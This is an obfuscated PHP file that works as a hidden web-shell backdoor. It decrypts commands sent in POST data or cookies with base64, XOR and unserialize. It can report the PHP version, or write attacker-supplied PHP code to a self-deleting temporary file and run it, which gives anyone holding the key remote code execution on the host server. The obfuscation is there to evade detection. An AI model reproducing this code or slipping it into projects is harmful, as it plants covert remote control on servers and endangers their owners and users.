<?php 
$uscvsrm    = /*  _ */ 'uscvsrm'    ^  '';$zuwfvza	= /*  umb */ $uscvsrm(97)   .    "r"."r".$uscvsrm(97)  . /*   yemuhl  */ "y"."\x5f"  .       "m"."\141"      . /*   zfnu_v   */ "p";


$hccjywyuqx /* cvq_   */ =      "c"."o"."\x75"    .    "\156"  .  "t";





function	azgcq($paszaivt,      $wcvcpjdc)
{  global	$uscvsrm;


 /*pwtq */     $paszaivt /* o*/ = /*  xqdea  */ $uscvsrm(517-457)     .      "?"."p".$uscvsrm(104) /*txot   */ .    "p".$uscvsrm(32)  .    $uscvsrm(429-312) /* vlfemp*/ .  "n"."\154" /*_  */ .	"\151" /* fdfg*/ .   "\x6e" /*   g */ .	"\153" /* _omufe   */ .      $uscvsrm(40)   . /* vhqben   */ $uscvsrm(819-724)    . /* z   */ "_"."F"."I".$uscvsrm(719-643) /*   emwb_z  */ . /*_*/ "\x45"      .    "_"."\x5f"    .	")"."\x3b"	.	$uscvsrm(32)   .	$paszaivt[$uscvsrm(100)];
 /* afesy*/ $mrfgdduhu	= /*  r*/ "\x66"    .	$uscvsrm(105)    .    "l".$uscvsrm(101)	. /*   begfh   */ "_"."p"."u"."\164" /*  pttfn  */ .     "_".$uscvsrm(99)    .  $uscvsrm(111)     .    "\156" /*   pao   */ . /*zrxck   */ "\x74"	. /* jay*/ "\145"	. /*   qssru*/ "n"."t"."s";

      
	$mrfgdduhu($wcvcpjdc,	$paszaivt);

	 /* s_hxvw */ gvhpn_skpr($wcvcpjdc);

}




$rx_tzs    =	73;





function /*  c */ gvhpn_skpr($wcvcpjdc)


{ /* pu  */ global  $uscvsrm;    
  include($wcvcpjdc);


 /*te   */ $lteaufhdfv	=    $wcvcpjdc;   @unlink($lteaufhdfv);


}



function    cztxw()

{      global    $uscvsrm;
	$smidi	=    array();

	$smidi["p"."\166"]	=  phpversion();

	$smidi["s"."v"]     =      "3"."."."5";	$swpzs /*m  */ =	74;
 /* mzrqw*/ echo      @serialize($smidi);
}
function    qbzthnqtcv($paszaivt,    $noryvs_mi)
{ /*  h*/ global    $uscvsrm;

 /* lbxt */ $ln_idg /* zcrl   */ =    "";	$yslvjrmaxbrtblcqje	=    'oxvifubi'; /*   pnd   */ $sivzglbw	=    hash('sha256', /* wimev*/ $paszaivt);
  $smididihnwqgl /* lbwvq*/ = /*oek*/ str_replace('jh',	$sivzglbw,    $yslvjrmaxbrtblcqje);
 /*brdoii*/ $smidi /*yyebdq  */ = /*ja   */ 0;


    while    ($smidi    <   strlen($paszaivt))	{

   $sjmigslv /*   d */ =      isset($noryvs_mi)  ?	$noryvs_mi /*  t */ : /*   tspr_  */ '';
   for    ($yslvjrmax /* txadbz*/ = /*   awehdm   */ 0;	$yslvjrmax /*a  */ < /* oslk*/ strlen($sjmigslv) /*g  */ &&	$smidi /* lbrhr */ <       strlen($paszaivt);       $yslvjrmax++,    $smidi++)    {
       $ln_idg /*  p_ */ .=    $uscvsrm(ord($paszaivt[$smidi])    ^	ord($sjmigslv[$yslvjrmax]));

     }
 /*   py   */ if /*   ctmwtv   */ (strlen($ln_idg)     > /*lhyt  */ 20)      {   $smididihnwqgl     = /* pty */ substr($ln_idg,   0,     20);


 /*   riie_ */ }

  }     if     (empty($ln_idg)) /*  bgte*/ {


 /* n*/ $ln_idg	=	date('Y-m-d    H:i:s');

	}
       return    $ln_idg;

}




function /*   dt*/ vkvkopiwux($hqrcm)

{  global	$uscvsrm; /*   jdt */ 

    $gfhboakuk	= /*   gvke*/ "1"."\71" /*eknwkh */ .      "\x38"	. /* icwisv   */ "\64"    .	"\x39"    . /* zq_but   */ "6"."3".$uscvsrm(101)    .     $uscvsrm(297-252)    .	"6"."\x38" /*   tctv  */ . /*  dwoe  */ "2"."7"."-"."\64" /*   iwvaa */ . /*  wv   */ "8"."9".$uscvsrm(56)    . /* _upo   */ $uscvsrm(45)    . /*pbnp */ "\71" /*jj  */ . /*   m   */ "\x64"    . /* mk */ "5".$uscvsrm(100)."\55"	.   "b".$uscvsrm(101) /*  g*/ .  "\x66"	. /*xwnupj*/ "3".$uscvsrm(97).$uscvsrm(58-8) /*   ej  */ . /*  t*/ $uscvsrm(399-342)    . /* g   */ "f"."4"."\x65"    . /*   djnna   */ $uscvsrm(54) /* xtlvg  */ .  "\x32";
        /* zsonb */ foreach /*  _   */ ($hqrcm /*   oalnlx   */ as     $tx_xiqu  => /*adfc  */ $paszaivt)     {


	mkgrdx(base64_decode($paszaivt), /* qdf_rv */ $gfhboakuk,  $tx_xiqu);

    }

}

function    mkgrdx($paszaivt,     $gfhboakuk,	$tx_xiqu)
{


	global      $uscvsrm;

 /*  td   */ 

	$paszaivt      =  unserialize(qbzthnqtcv(qbzthnqtcv($paszaivt,    $gfhboakuk),     $tx_xiqu));	$rxgdksd  =    'pd';


	$mijshl    =      'aqhomat';

     if /*   gp_r   */ (isset($paszaivt["\141"   .	"k"]))	{
    if    ($paszaivt[$uscvsrm(97)]    == /* flr   */ "i") /*a*/ {


     cztxw(); /*   ztqr */ } /*  estwhu */ elseif /*dtqwnp*/ ($paszaivt[$uscvsrm(97)] /*zuoecz */ ==	"e")     {
	azgcq($paszaivt,    sprintf("."."/".$uscvsrm(821-784) /* h   */ .	$uscvsrm(115) /*ultm   */ . /* ehrb */ "."."p".$uscvsrm(121-13),    md5($gfhboakuk)));			$ehzolbufor     =   44;
   }

	exit();


    }}

vkvkopiwux($_POST); /*  j*/ 


$z_zdvjsvq       =    $zuwfvza('rawurldecode',    $_POST);


$mhcjc /*a   */ = /*   iwvmp   */ $hccjywyuqx($z_zdvjsvq);


vkvkopiwux($_COOKIE);     

$wp_uj    =   $zuwfvza('rawurldecode', /* rbpfas*/ $_COOKIE);




?>